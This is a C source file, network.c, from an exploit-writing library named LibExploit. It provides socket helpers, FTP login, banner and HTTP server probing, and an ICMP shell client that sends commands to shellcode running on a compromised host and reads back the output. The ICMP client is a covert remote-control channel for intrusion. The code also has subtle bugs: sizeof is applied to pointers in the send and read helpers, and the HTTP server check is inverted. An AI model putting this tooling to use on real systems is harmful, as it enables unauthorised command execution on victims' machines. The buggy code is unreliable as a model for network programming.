/* LibExploit
 *
 * FILENAME : network.c
 * DATE     : 11/08/2002
 * CODER    : Simon Roses Femerling
 * ABSTRACT : Network functions file.
 *
 * Copyright (C) 2002-2003. Simon Roses Femerling <sroses@ibsec.net>
*/

#include "../include/LibExploit.h"

/*************************************************************
* Global Variables
*************************************************************/

char buff[4096];
struct sockaddr_in Target;
struct hostent *he;
struct icmphdr *icmp_hdr = (struct icmphdr *)buff;
char key = 0;
char *skey[];

/*************************************************************
* Functions
*************************************************************/

/*
 * FUNCTION : int LibExploit_Connect
 * PARAMS   : char *host, int port
 * RETURN   : An int of the socket or
 *            -1 if fails.
 * ABSTRACT : Connect to given host on port. 
*/
int LibExploit_Connect(char *host, int port) {
	int Sock, Con;
	struct sockaddr_in Victim;
	struct hostent *he;

	he = gethostbyname(host);
	if(he == NULL) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "gethostbyname() error");	
		return -1;
	}
	
	Sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(Sock == -1) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "socket() error");	
		return -1;
	}

	memcpy(&Victim.sin_addr, he->h_addr, he->h_length);
	Victim.sin_family = AF_INET;
	Victim.sin_port = htons(port);
	
	Con = connect(Sock, (struct sockaddr *) &Victim, sizeof(Victim));
	if(Con == -1) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "connect() error");	
		return -1;
	}

return Sock;
}

/*
 * FUNCTION : int LibExploit_Write
 * PARAMS   : int Sock, char *msg
 * RETURN   : An int with the number of bytes written or
 *            -1 if fails.
 * ABSTRACT : Write data to a socket.
*/
int LibExploit_Write(int Sock, char *msg) {
	int ret;

	ret = write(Sock, msg, strlen(msg));
	if(ret == -1) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "write() error");	
	}

return(ret);
}

/*
 * FUNCTION : unsigned long LibExploit_Resolve
 * PARAMS   : char *host
 * RETURN   : An unsigned long of the resolving host or
 *            -1 if fails. 
 * ABSTRACT : Resolve host.
*/
unsigned long LibExploit_Resolve(char *host) {
	struct hostent *he;
	unsigned long ip;

	if((ip = inet_addr(host)) == -1)  {
		if((he = gethostbyname(host)) == NULL) {
			snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "gethostbyname() error");	
			return -1;
		}
		memcpy(&ip, he->h_addr,4);
	}
	
return(ip);
}

/*
 * FUNCTION : void LibExploit_Loginftp
 * PARAMS   : int Sock, char *user, char *pass
 * RETURN   : ...
 * ABSTRACT : Do the ftp login procress.
*/
void LibExploit_Loginftp(int Sock, char *user, char *pass) {
	char snd[MAX1024], rcv[MAX1024];
	int n;

	memset(snd, '\0', MAX1024);
	sprintf(snd, "USER %s\r\n", user);
	LibExploit_Write(Sock, snd);	

	while((n=read(Sock, rcv, sizeof(rcv))) > 0) {
		rcv[n] = 0;
		if(strchr(rcv, '\n') != NULL)
			break;
	}

	memset(snd, '\0', MAX1024);
	sprintf(snd, "PASS %s\r\n", pass);
	LibExploit_Write(Sock, snd);	

	while((n=read(Sock, rcv, sizeof(rcv))) > 0) {
		rcv[n] = 0;
		if(strchr(rcv, '\n') != NULL)
			break;
	}

return;
}

/*
 * FUNCTION : int LibExploit_Send
 * PARAMS   : int Sock, const char *msg
 * RETURN   : An int with the numbers of characters sent or
 *            -1 if fails.
 * ABSTRACT : Send data via socket.
*/
int LibExploit_Send(int Sock, const char *msg) {
	int ret;

	ret = send(Sock, msg, sizeof(msg), 0);
	if(ret == -1) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "send() error");	
	}

return(ret);
}

/*
 * FUNCTION : int LibExploit_Close
 * PARAMS   : int Sock
 * RETURN   : 0 on success or
 *            -1 if fails.
 * ABSTRACT : Close a socket.
*/
int LibExploit_Close(int Sock) {
	int ret;	

	ret = close(Sock);
	if(ret == -1) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "close() error");	
	}
	
return(ret);
}

/*
 * FUNCTION : int LibExploit_Read
 * PARAMS   : int Sock, char data[MAX1024]
 * RETURN   : An int with the number of bytes read or
 *            -1 if fails.
 * ABSTRACT : Read data from socket.
*/
int LibExploit_Read(int Sock, char dt[MAX1024]) {
	int ret;

	ret = read(Sock, dt, sizeof(dt));
	if(ret == -1) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "read() error");	
	}

return(ret);
}

/*
 * FUNCTION : int LibExploit_CheckBanner
 * PARAMS   : int Sock, char *str
 * RETURN   : 1 if banner is found or
 *            -1 if banner is not found.
 * ABSTRACT : Check a banner port.
*/
int LibExploit_CheckBanner(int Sock, char str[MAX1024]) {
	char buf[MAX1024];
	int ret=0;

	bzero(buf, sizeof(buf));
	ret = read(Sock, buf, sizeof(buf));
	if(ret == -1) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "read() error");	
		return (ret);		
	}
	if(strstr(buf, str) != NULL) {
		ret = 1;
	} else {
		ret = -1;
	}

return(ret);	
}

/*
 * FUNCTION : int LibExploit_InternalConnectICMPClient
 * PARAMS   : char *host
 * RETURN   : Return socket descriptor or
 *            -1 if fails.
 * ABSTRACT : Open a ICMP shell client.
*/
int LibExploit_InternalConnectICMPClient(char *host) {
	int sock;
	
	if((he = gethostbyname(host)) == NULL) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "gethostbyname() error");	
		return -1;
	}	

	if((sock = socket(AF_INET, SOCK_RAW, 1)) < 0) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "socket() error");	
		return -1;
	}
	
	skey[0] = "0x99"; 

	if((key = strtoul(skey[0],&skey[0],16)) == 0) {
		LibExploit_InternalPrint("no key..!!\n");
		return -1;
	}

	Target.sin_family = AF_INET;
	Target.sin_port = 0;
	Target.sin_addr = *((struct in_addr *) he->h_addr);
	memset(&(Target.sin_zero),0,8);

return sock;	
}

/*
 * FUNCTION : int LibExploit_InternalCMDICMPClient
 * PARAMS   : int sock, char *cmd
 * RETURN   : Return 0 on success or
 *            -1 if fails.
 * ABSTRACT : Send a command to the ICMP shellcode.
*/
int LibExploit_InternalCMDICMPClient(int sock, char *cmd) {
	char *data = &buff[sizeof(struct icmphdr)+8];
	char dtemp[MAX1024];
	int sa_size = sizeof(struct sockaddr);
	fd_set rf;
	struct timeval tv;
	int dat;

	memset(buff,0,sizeof(buff));
	icmp_hdr->type = key;
	icmp_hdr->code = 0;
	icmp_hdr->checksum = 0xDEAD;
	icmp_hdr->un.gateway = 0;

	strncpy(dtemp, cmd, MAX1024);
	snprintf(data,MAX1024,"\"%s\"",dtemp);
	
	if(sendto(sock, buff, sizeof(struct icmphdr)+strlen(data)+8+1,0,(struct sockaddr *)&Target, sa_size)<0) {
		snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "sendto() error");	
		return -1;	
	}

	FD_ZERO(&rf);
	FD_SET(sock, &rf);
	tv.tv_sec = 2;
	tv.tv_usec = 0;
	while(select(sock+1,&rf, NULL, NULL, &tv)) {
		if((dat = recvfrom(sock, buff, 4096, 0, (struct sockaddr *)&Target, &sa_size))<0) { 		
			snprintf(error_msg, LIBEXPLOIT_ERROR_SIZE, "recvfrom() error");	
			return -1;	
		}
		buff[dat] = 0;
		if(buff[20] == key+1) {
			LibExploit_InternalPrint(&buff[21]);
		}
	}

return(0);	
}

/*
 * FUNCTION : char *LibExploit_SendHTTPHead
 * PARAMS   : int sock
 * RETURN   : Return a char * with the server or
 *            "Not found" if server string is not
 *            found or NULL if fails.
 * ABSTRACT : Send a HEAD Request to web server and
 *            server version.
*/
char *LibExploit_SendHTTPHead(sock) {
	char *str = "HEAD / HTTP/1.1\r\n\r\n";
	char *s = "Server:";
	char data[MAX1024];
	int er;
	char *res;	

	er = LibExploit_Send(sock,str);
	if(er == -1) {
		return NULL;
	}

	bzero(data,sizeof(data));
	er = LibExploit_Read(sock, data);
	if(er == -1) {
		return NULL;
	}

	res = strstr(data,s);
	if(res == NULL) {
		return res;
	} else {
		return("Not found");
	}
}

/* SRF E0F */
